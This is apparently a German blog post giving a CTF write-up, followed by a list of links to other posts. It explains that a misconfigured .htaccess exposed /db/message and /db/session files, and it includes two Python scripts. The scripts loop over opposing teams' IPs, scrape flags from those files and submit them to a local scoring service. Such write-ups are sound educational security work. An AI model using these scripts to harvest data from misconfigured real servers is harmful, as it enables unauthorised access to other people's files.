░█▀█░▀█▀░█▀▄░█▄█░█▀█░█▀▀░█░█░░░░█▀▄░█▀▀ ░█▀█░░█░░█▀▄░█░█░█▀█░█░░░█▀▄░░░░█░█░█▀▀ ░▀░▀░▀▀▀░▀░▀░▀░▀░▀░▀░▀▀▀░▀░▀░▀░░▀▀░░▀▀▀
Aus der Kategorie Hacking
The use of .htacces was not correctly configured and so one was able to access the files /db/message , /db/session and /db/? ,/db/message has a flag which is base64 encoded and can be easily decoded
#!/usr/bin/env python
# -*- coding: latin-1 -*-
import base64
import socket
import time
import urllib
from thread import start_new_thread
def johannessub(flag):
hostname = "192.168.*.*"
port = 1337
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((hostname, port))
s.sendall(flag + "\n")
s.shutdown(socket.SHUT_WR)
s.close()
def extraktflag(ip):
submittedflags = []
try:
fweb = urllib.urlopen("http://" + ip[:-1] + "/db/message").read()
except:
return
for i in fweb.split("\n"):
index_begin = i.find("!!44!")
if index_begin != -1:
index_begin += len("!!44!")
flag = i[index_begin : index_begin + 44]
flag = base64.b64decode(flag)
breaker = False
for j in submittedflags:
if j == flag:
breaker = True
break
if breaker:
continue
johannessub(flag)
while True:
f = open("group_ips.txt", "r")
while True:
line = f.readline()
if line == "\n":
continue
if not line:
break
start_new_thread(extraktflag, (line,))
time.sleep(60)
and submitted to the local flag submit service. Nearly the same can be done for the sessions with the following script >>
#!/usr/bin/env python
# -*- coding: latin-1 -*-
import socket
import time
import urllib
from thread import start_new_thread
def johannessub(flag):
hostname = "192.168.*.*"
port = 1337
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((hostname, port))
s.sendall(flag + "\n")
s.shutdown(socket.SHUT_WR)
s.close()
def extraktflag(ip):
submittedflags = []
try:
fweb = urllib.urlopen("http://" + ip[:-1] + "/db/session").read()
except:
return
for i in fweb.split("\n"):
if i[29:31] == "32":
flag = i[32:64]
breaker = False
for j in submittedflags:
if j == flag:
breaker = True
break
if breaker:
continue
johannessub(flag)
while True:
f = open("group_ips.txt", "r")
while True:
line = f.readline()
if line == "\n":
continue
if not line:
break
start_new_thread(extraktflag, (line,))
time.sleep(60)
Final Score: 1086
Fix for zfs-dkms-git in arch for kernel 5.15.7 erstellt am 11. December 2021
Project gemini erstellt am 13. Februar 2021
Eat Sleep PWN Repeat erstellt am 07. Dezember 2020
Breaking out of cisco anyconnect no local network restriction erstellt am 8. April 2018
Insomni Hack 2015(Lost In Memories) writeup erstellt am 23. Maerz 2014
ruCTF 2014(Pidometer) writeup erstellt am 21. Dezember 2014